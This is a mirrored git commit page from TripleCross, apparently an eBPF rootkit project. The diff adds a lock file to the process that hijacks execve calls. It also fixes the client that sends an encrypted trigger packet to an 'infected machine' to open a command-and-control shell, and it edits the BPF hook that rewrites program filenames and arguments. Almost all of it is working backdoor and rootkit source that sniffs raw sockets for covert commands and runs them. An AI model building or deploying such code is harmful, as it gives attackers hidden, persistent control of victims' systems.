mirror of
https://github.com/h3xduck/TripleCross.git
synced 2025-12-16 23:33:06 +08:00
Added locking mechanism for execve_hijack. Incorporated new library rawtcp with latest version without bug.
This commit is contained in:
h3xduck
Binary file not shown.
@@ -1695,8 +1695,8 @@ kit_bpf__create_skeleton(struct kit_bpf *obj)
|
||||
\x0c\0\0\x0d\x70\0\0\x90\x02\0\0\x50\x0c\0\0\x8a\x0c\0\0\x0d\x70\0\0\x98\x02\0\
|
||||
\0\x50\x0c\0\0\x8a\x0c\0\0\x0d\x70\0\0\xa8\x02\0\0\xe8\x02\0\0\0\0\0\0\0\0\0\0\
|
||||
\xf8\x02\0\0\xe8\x02\0\0\xc1\x07\0\0\x01\x0c\x04\0\xe0\x0c\0\0\x69\0\0\0\0\0\0\
|
||||
\0\xfd\x0c\0\0\x2b\x0d\0\0\0\x90\x03\0\x08\0\0\0\xfd\x0c\0\0\x89\x03\0\0\x16\
|
||||
\x94\x03\0\x18\0\0\0\xfd\x0c\0\0\x67\x0d\0\0\x08\x64\x01\0\x30\0\0\0\xfd\x0c\0\
|
||||
\0\xfd\x0c\0\0\x2b\x0d\0\0\0\x98\x03\0\x08\0\0\0\xfd\x0c\0\0\x89\x03\0\0\x16\
|
||||
\x9c\x03\0\x18\0\0\0\xfd\x0c\0\0\x67\x0d\0\0\x08\x64\x01\0\x30\0\0\0\xfd\x0c\0\
|
||||
\0\x67\x0d\0\0\x08\x64\x01\0\x38\0\0\0\xfd\x0c\0\0\x84\x0d\0\0\x05\x70\x01\0\
|
||||
\x60\0\0\0\xfd\x0c\0\0\xb2\x0d\0\0\x0b\x78\x01\0\xc0\0\0\0\xfd\x0c\0\0\xe1\x0d\
|
||||
\0\0\x0a\x80\x01\0\x10\x01\0\0\xfd\x0c\0\0\x0b\x0e\0\0\x12\x84\x01\0\x18\x01\0\
|
||||
@@ -1749,9 +1749,9 @@ kit_bpf__create_skeleton(struct kit_bpf *obj)
|
||||
\x08\x08\x03\0\x88\x09\0\0\xfd\x0c\0\0\x1d\x16\0\0\x09\x0c\x03\0\xa8\x09\0\0\
|
||||
\xfd\x0c\0\0\x44\x16\0\0\x3c\x14\x03\0\xc0\x09\0\0\xfd\x0c\0\0\x44\x16\0\0\x08\
|
||||
\x14\x03\0\xd0\x09\0\0\xfd\x0c\0\0\x44\x16\0\0\x08\x14\x03\0\xd8\x09\0\0\xfd\
|
||||
\x0c\0\0\x75\x0e\0\0\x09\x18\x03\0\0\x0a\0\0\xfd\x0c\0\0\x89\x16\0\0\x05\x24\
|
||||
\x03\0\x28\x0a\0\0\xfd\x0c\0\0\xc4\x16\0\0\x05\x28\x03\0\x50\x0a\0\0\xfd\x0c\0\
|
||||
\0\xf5\x16\0\0\x05\x2c\x03\0\x78\x0a\0\0\xfd\x0c\0\0\x24\x17\0\0\x05\x30\x03\0\
|
||||
\x0c\0\0\x75\x0e\0\0\x09\x18\x03\0\0\x0a\0\0\xfd\x0c\0\0\x89\x16\0\0\x05\x2c\
|
||||
\x03\0\x28\x0a\0\0\xfd\x0c\0\0\xc4\x16\0\0\x05\x30\x03\0\x50\x0a\0\0\xfd\x0c\0\
|
||||
\0\xf5\x16\0\0\x05\x34\x03\0\x78\x0a\0\0\xfd\x0c\0\0\x24\x17\0\0\x05\x38\x03\0\
|
||||
\xb8\x0a\0\0\xfd\x0c\0\0\0\0\0\0\0\0\0\0\xc0\x0a\0\0\xfd\x0c\0\0\x53\x17\0\0\
|
||||
\x08\x18\x01\0\xd8\x0a\0\0\xfd\x0c\0\0\x53\x17\0\0\x08\x18\x01\0\xe0\x0a\0\0\
|
||||
\xfd\x0c\0\0\x8f\x11\0\0\x09\x1c\x01\0\x18\x0b\0\0\xfd\x0c\0\0\x83\x17\0\0\x08\
|
||||
@@ -1761,7 +1761,7 @@ kit_bpf__create_skeleton(struct kit_bpf *obj)
|
||||
\0\xc0\x17\0\0\x09\x34\x01\0\x88\x0b\0\0\xfd\x0c\0\0\x0e\x18\0\0\x27\x48\x01\0\
|
||||
\xa0\x0b\0\0\xfd\x0c\0\0\x0e\x18\0\0\x05\x48\x01\0\xb8\x0b\0\0\xfd\x0c\0\0\xbd\
|
||||
\x11\0\0\x08\x80\x02\0\xc0\x0b\0\0\xfd\x0c\0\0\x58\x18\0\0\x09\x84\x02\0\xe0\
|
||||
\x0b\0\0\xfd\x0c\0\0\xc1\x07\0\0\x01\xac\x03\0\xd6\x18\0\0\x89\0\0\0\0\0\0\0\
|
||||
\x0b\0\0\xfd\x0c\0\0\xc1\x07\0\0\x01\xb4\x03\0\xd6\x18\0\0\x89\0\0\0\0\0\0\0\
|
||||
\xdf\x18\0\0\x04\x19\0\0\0\xd4\0\0\x08\0\0\0\xdf\x18\0\0\x2d\x19\0\0\x29\xe0\0\
|
||||
\0\x10\0\0\0\xdf\x18\0\0\x63\x19\0\0\x25\xe4\0\0\x18\0\0\0\x8d\x19\0\0\xc8\x19\
|
||||
\0\0\x15\x30\0\0\x28\0\0\0\xdf\x18\0\0\x01\x1a\0\0\x08\x0c\x01\0\x30\0\0\0\xdf\
|
||||
|
||||
BIN
src/bin/kit
BIN
src/bin/kit
Binary file not shown.
@@ -201,7 +201,7 @@ void activate_command_control_shell_encrypted(char* argv){
|
||||
char* payload = malloc(SYN_PACKET_PAYLOAD_LEN);
|
||||
srand(time(NULL));
|
||||
for(int ii=0; ii<SYN_PACKET_PAYLOAD_LEN; ii++){
|
||||
payload[ii] = rand();
|
||||
payload[ii] = (char)rand();
|
||||
}
|
||||
//Follow protocol rules
|
||||
char section[SYN_PACKET_SECTION_LEN];
|
||||
@@ -231,9 +231,7 @@ void activate_command_control_shell_encrypted(char* argv){
|
||||
strncpy(payload+0x0D, result, SYN_PACKET_SECTION_LEN);
|
||||
|
||||
|
||||
|
||||
|
||||
packet_t packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, CC_PROT_SYN);
|
||||
packet_t packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, payload);
|
||||
printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
|
||||
//Sending the malicious payload
|
||||
if(rawsocket_send(packet)<0){
|
||||
@@ -294,7 +292,7 @@ void main(int argc, char* argv[]){
|
||||
char path_arg[512];
|
||||
|
||||
//Command line argument parsing
|
||||
while ((opt = getopt(argc, argv, ":S:c:h:e")) != -1) {
|
||||
while ((opt = getopt(argc, argv, ":S:c:e:h")) != -1) {
|
||||
switch (opt) {
|
||||
case 'S':
|
||||
print_welcome_message();
|
||||
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -198,6 +198,8 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
|
||||
bpf_printk("Error reading 1\n");
|
||||
};
|
||||
|
||||
//hijacker_state = 1;
|
||||
|
||||
bpf_printk("SUCCESS NEW FILENAME: %s\n", newfilename);
|
||||
bpf_printk("NEW ARGV0: %s\n\n", newargv[0]);
|
||||
bpf_printk("NEW ARGV1: %s\n", newargv[1]);
|
||||
|
||||
Binary file not shown.
@@ -15,6 +15,8 @@
|
||||
#include <netdb.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <sys/file.h>
|
||||
#include <errno.h>
|
||||
|
||||
#include "lib/RawTCP.h"
|
||||
#include "../common/c&c.h"
|
||||
@@ -22,6 +24,8 @@
|
||||
#include <bpf/bpf.h>
|
||||
#include <bpf/libbpf.h>
|
||||
|
||||
#define LOCK_FILE "/tmp/rootlog"
|
||||
|
||||
char* getLocalIpAddress(){
|
||||
char hostbuffer[256];
|
||||
char* IPbuffer = calloc(256, sizeof(char));
|
||||
@@ -65,13 +69,8 @@ char* execute_command(char* command){
|
||||
return res;
|
||||
}
|
||||
|
||||
int hijacker_process_routine(int argc, char* argv[]){
|
||||
int fd = open("/tmp/rootlog", O_RDWR | O_CREAT | O_TRUNC, 0666);
|
||||
if(fd<0){
|
||||
perror("Failed to open log file");
|
||||
//return -1;
|
||||
}
|
||||
|
||||
int hijacker_process_routine(int argc, char* argv[], int fd){
|
||||
//Lock the file to indicate we are already into the routine
|
||||
time_t rawtime;
|
||||
struct tm * timeinfo;
|
||||
|
||||
@@ -98,7 +97,7 @@ int hijacker_process_routine(int argc, char* argv[]){
|
||||
write(fd, "\n", 1);
|
||||
write(fd, "Sniffing...\n", 13);
|
||||
|
||||
|
||||
printf("Running hijacking process\n");
|
||||
packet_t packet = rawsocket_sniff_pattern(CC_PROT_SYN);
|
||||
if(packet.ipheader == NULL){
|
||||
write(fd, "Failed to open rawsocket\n", 1);
|
||||
@@ -149,6 +148,7 @@ int hijacker_process_routine(int argc, char* argv[]){
|
||||
}
|
||||
}
|
||||
|
||||
flock(fd, LOCK_UN);
|
||||
close(fd);
|
||||
return 0;
|
||||
}
|
||||
@@ -177,6 +177,7 @@ int main(int argc, char* argv[], char *envp[]){
|
||||
perror("Failed to execve()");
|
||||
exit(-1);
|
||||
}
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
||||
@@ -190,8 +191,23 @@ int main(int argc, char* argv[], char *envp[]){
|
||||
if (pid == 0) {
|
||||
//Child process
|
||||
printf("I am the child with pid %d\n", (int) getpid());
|
||||
|
||||
//First of all check if the locking log file is locked, which indicates that the backdoor process is already running
|
||||
int fd = open(LOCK_FILE, O_RDWR | O_CREAT | O_TRUNC, 0666);
|
||||
if(fd<0){
|
||||
perror("Failed to open lock file before entering hijacking routine");
|
||||
exit(-1);
|
||||
}
|
||||
if (flock(fd, LOCK_EX|LOCK_NB) == -1) {
|
||||
if (errno == EWOULDBLOCK) {
|
||||
perror("lock file was locked");
|
||||
} else {
|
||||
perror("Error with the lockfile");
|
||||
}
|
||||
exit(-1);
|
||||
}
|
||||
hijacker_process_routine(argc, argv, fd);
|
||||
printf("Child process is exiting\n");
|
||||
hijacker_process_routine(argc, argv);
|
||||
exit(0);
|
||||
}
|
||||
//Parent process. Call original hijacked command
|
||||
|
||||
Binary file not shown.
Reference in New Issue
Block a user